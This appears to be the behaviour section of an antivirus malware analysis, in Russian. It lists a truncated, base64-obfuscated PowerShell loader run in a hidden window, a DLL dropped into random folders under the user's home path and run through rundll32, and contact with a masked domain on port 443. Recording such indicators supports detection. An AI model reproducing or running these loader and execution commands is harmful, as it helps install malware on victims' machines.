Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUAHIAMwB0ADAAOAB2AD0AKAAnAEgAegAnACsAKAAnADYAJwArACcAawB5ACcAKQArACcAcQBrACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQAnACsAJwB0AGUAbQAnACkAIAAkAGUATgB2ADoAVQBTAEUAcgBwAHIAbwBmAGkAbABFAFwAcQBjAF...
- %HOMEPATH%\qcqpu4x\lq4d0uy\jpx2cf_r.dll
- 'di###ign.tech':443
- DNS ASK di###ign.tech
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUAHIAMwB0ADAAOAB2AD0AKAAnAEgAegAnACsAKAAnADYAJwArACcAawB5ACcAKQArACcAcQBrACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQAnACsAJwB0AGUAbQAnACkAIAAkAGUATgB2ADoAVQBTAEUAcgBwAHIAbwBmAGkAbABFAFwAcQBjAF...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Qcqpu4x\Lq4d0uy\Jpx2cf_r.dll 0